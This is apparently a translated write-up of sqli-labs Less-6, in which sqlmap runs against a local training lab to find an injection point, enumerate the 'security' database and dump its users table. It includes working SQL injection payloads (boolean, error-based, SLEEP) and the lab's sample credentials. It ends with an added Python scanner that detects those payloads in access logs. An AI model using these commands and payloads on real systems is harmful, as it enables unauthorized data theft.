sqlmap is a Python script (sqlmap.py),

so it is run from cmd (the Windows command prompt) with python.

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u  http://127.0.0.2:777/Less-6/?id=1
___
__H__
___ ___[)]_____ ___ ___ {1.7.3.4#dev}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:30:02 /2023-04-23/

[19:30:03] [INFO] resuming back-end DBMS 'mysql'
[19:30:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3744=3744#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:30:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:30:03] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:30:03 /2023-04-23/

Check whether there is an injection point.

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u  http://127.0.0.2:777/Less-6/?id=1  --current-db
___
__H__
___ ___["]_____ ___ ___ {1.7.3.4#dev}
|_ -| . ['] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:30:55 /2023-04-23/

[19:30:55] [INFO] resuming back-end DBMS 'mysql'
[19:30:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3744=3744#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:30:56] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:30:56] [INFO] fetching current database
[19:30:56] [INFO] retrieved: 'security'
current database: 'security'
[19:30:56] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:30:56 /2023-04-23/

Find the current database.

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u http://127.0.0.2:777/Less-6/?id=1 --tables -D "security"
___
__H__
___ ___[)]_____ ___ ___ {1.7.3.4#dev}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:31:15 /2023-04-23/

[19:31:15] [INFO] resuming back-end DBMS 'mysql'
[19:31:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3744=3744#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:31:16] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:31:16] [INFO] fetching tables for database: 'security'
[19:31:16] [INFO] retrieved: 'emails'
[19:31:16] [INFO] retrieved: 'referers'
[19:31:16] [INFO] retrieved: 'uagents'
[19:31:16] [INFO] retrieved: 'users'
Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

[19:31:16] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:31:16 /2023-04-23/

List all tables in the current database.

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u http://127.0.0.2:777/Less-6/?id=1 --columns -D "security" -T "users"
___
__H__
___ ___["]_____ ___ ___ {1.7.3.4#dev}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:31:43 /2023-04-23/

[19:31:43] [INFO] resuming back-end DBMS 'mysql'
[19:31:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3744=3744#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:31:43] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.5.9, Apache 2.4.39
back-end DBMS: MySQL >= 5.6
[19:31:43] [INFO] fetching columns for table 'users' in database 'security'
[19:31:43] [INFO] resumed: 'id'
[19:31:43] [INFO] resumed: 'int(3)'
[19:31:43] [INFO] resumed: 'username'
[19:31:43] [INFO] resumed: 'varchar(20)'
[19:31:43] [INFO] resumed: 'password'
[19:31:43] [INFO] resumed: 'varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[19:31:43] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:31:43 /2023-04-23/

Listing the columns of users shows username and password.

D:\Ctf\sqlmap\sqlmap>python sqlmap.py -u http://127.0.0.2:777/Less-6/?id=1 --columns -D "security" -T "users" --dump
___
__H__
___ ___[']_____ ___ ___ {1.7.3.4#dev}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 19:31:55 /2023-04-23/

[19:31:55] [INFO] resuming back-end DBMS 'mysql'
[19:31:55] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3744=3744#

Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=1" AND GTID_SUBSET(CONCAT(0x7176626a71,(SELECT (ELT(7253=7253,1))),0x716a717171),7253)-- vAnE

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 4714 FROM (SELECT(SLEEP(5)))bfJG)-- Mruu
---
[19:31:55] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.39, PHP 5.5.9
back-end DBMS: MySQL >= 5.6
[19:31:55] [INFO] fetching columns for table 'users' in database 'security'
[19:31:55] [INFO] resumed: 'id'
[19:31:55] [INFO] resumed: 'int(3)'
[19:31:55] [INFO] resumed: 'username'
[19:31:55] [INFO] resumed: 'varchar(20)'
[19:31:55] [INFO] resumed: 'password'
[19:31:55] [INFO] resumed: 'varchar(20)'
Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

[19:31:55] [INFO] fetching columns for table 'users' in database 'security'
[19:31:55] [INFO] resumed: 'id'
[19:31:55] [INFO] resumed: 'int(3)'
[19:31:55] [INFO] resumed: 'username'
[19:31:55] [INFO] resumed: 'varchar(20)'
[19:31:55] [INFO] resumed: 'password'
[19:31:55] [INFO] resumed: 'varchar(20)'
[19:31:55] [INFO] fetching entries for table 'users' in database 'security'
[19:31:55] [INFO] resumed: '1'
[19:31:55] [INFO] resumed: 'Dumb'
[19:31:55] [INFO] resumed: 'Dumb'
[19:31:55] [INFO] resumed: '2'
[19:31:55] [INFO] resumed: 'I-kill-you'
[19:31:55] [INFO] resumed: 'Angelina'
[19:31:55] [INFO] resumed: '3'
[19:31:55] [INFO] resumed: 'p@ssword'
[19:31:55] [INFO] resumed: 'Dummy'
[19:31:55] [INFO] resumed: '4'
[19:31:55] [INFO] resumed: 'crappy'
[19:31:55] [INFO] resumed: 'secure'
[19:31:55] [INFO] resumed: '5'
[19:31:55] [INFO] resumed: 'stupidity'
[19:31:55] [INFO] resumed: 'stupid'
[19:31:55] [INFO] resumed: '6'
[19:31:55] [INFO] resumed: 'genious'
[19:31:55] [INFO] resumed: 'superman'
[19:31:55] [INFO] resumed: '7'
[19:31:55] [INFO] resumed: 'mob!le'
[19:31:55] [INFO] resumed: 'batman'
[19:31:55] [INFO] resumed: '8'
[19:31:55] [INFO] resumed: 'admin'
[19:31:55] [INFO] resumed: 'admin'
[19:31:55] [INFO] resumed: '9'
[19:31:55] [INFO] resumed: 'admin1'
[19:31:55] [INFO] resumed: 'admin1'
[19:31:55] [INFO] resumed: '10'
[19:31:55] [INFO] resumed: 'admin2'
[19:31:55] [INFO] resumed: 'admin2'
[19:31:55] [INFO] resumed: '11'
[19:31:55] [INFO] resumed: 'admin3'
[19:31:55] [INFO] resumed: 'admin3'
[19:31:55] [INFO] resumed: '12'
[19:31:55] [INFO] resumed: 'dumbo'
[19:31:55] [INFO] resumed: 'dhakkan'
[19:31:55] [INFO] resumed: '14'
[19:31:55] [INFO] resumed: 'admin4'
[19:31:55] [INFO] resumed: 'admin4'
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

[19:31:55] [INFO] table 'security.users' dumped to CSV file 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2\dump\security\users.csv'
[19:31:55] [INFO] fetched data logged to text files under 'C:\Users\86138\AppData\Local\sqlmap\output\127.0.0.2'

[*] ending @ 19:31:55 /2023-04-23/

Dump the contents of the users table.

The first 9 levels of sqli-labs follow the same routine.
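As an added defender-side example (not part of the original post), here is a small Python scanner that flags the three payload shapes sqlmap reported above (the `AND n=n` tautology, `GTID_SUBSET(CONCAT(...))` and `SLEEP(n)`) when they appear in Apache access-log lines. The log lines and client IP are constructed, and the assumption that sqlmap's default User-Agent begins with `sqlmap/` is mine, not something the post shows.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Signatures for the three techniques sqlmap confirmed on this page: a true
# tautology (boolean-based blind), GTID_SUBSET(CONCAT(...)) (error-based) and
# SLEEP(n) (time-based blind). sqlmap's false probes ("AND 1=2" style) use a
# different pair of numbers, so they are deliberately not matched here.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "error-based": re.compile(r"\bGTID_SUBSET\s*\(\s*CONCAT\s*\(", re.I),
    "time-based blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}

LOG_RE = re.compile(  # Apache combined log format
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (not from a real server): the query strings are the
# URL-encoded forms of the payloads listed above; the User-Agent on two of them
# is assumed to be sqlmap's default (used when --random-agent is not given).
LOG_LINES = """\
203.0.113.5 - - [23/Apr/2023:19:30:03 +0800] "GET /Less-6/?id=1 HTTP/1.1" 200 1231 "-" "Mozilla/5.0"
203.0.113.5 - - [23/Apr/2023:19:30:03 +0800] "GET /Less-6/?id=1%22%20AND%203744%3D3744%23 HTTP/1.1" 200 1231 "-" "sqlmap/1.7.3.4#dev (https://sqlmap.org)"
203.0.113.5 - - [23/Apr/2023:19:30:03 +0800] "GET /Less-6/?id=1%22%20AND%20GTID_SUBSET%28CONCAT%280x7176626a71%2C%28SELECT%20%28ELT%287253%3D7253%2C1%29%29%29%2C0x716a717171%29%2C7253%29--%20vAnE HTTP/1.1" 200 1550 "-" "sqlmap/1.7.3.4#dev (https://sqlmap.org)"
203.0.113.5 - - [23/Apr/2023:19:30:09 +0800] "GET /Less-6/?id=1%22%20AND%20%28SELECT%204714%20FROM%20%28SELECT%28SLEEP%285%29%29%29bfJG%29--%20Mruu HTTP/1.1" 200 1231 "-" "Mozilla/5.0"
"""

def classify_request(path, ua=""):
    """Return the techniques whose signature appears in any URL-decoded
    query-string value of `path`, plus a hint when the UA is sqlmap's own."""
    hits = []
    for values in parse_qs(urlsplit(path).query, keep_blank_values=True).values():
        for val in values:
            for technique, sig in SIGNATURES.items():
                if technique not in hits and sig.search(val):
                    hits.append(technique)
    if ua.lower().startswith("sqlmap/"):
        hits.append("sqlmap user-agent")
    return hits

def scan_log(text):
    """Return (ip, path, hits) for every parseable line that trips a signature."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m and (hits := classify_request(m["path"], m["ua"])):
            alerts.append((m["ip"], m["path"], hits))
    return alerts
```

Signature matching catches only sqlmap's default payload shapes; a scan run with tamper scripts or a changed User-Agent needs the other indicators the page shows, such as the burst of requests to one parameter and the 5-second response delays of the time-based probes.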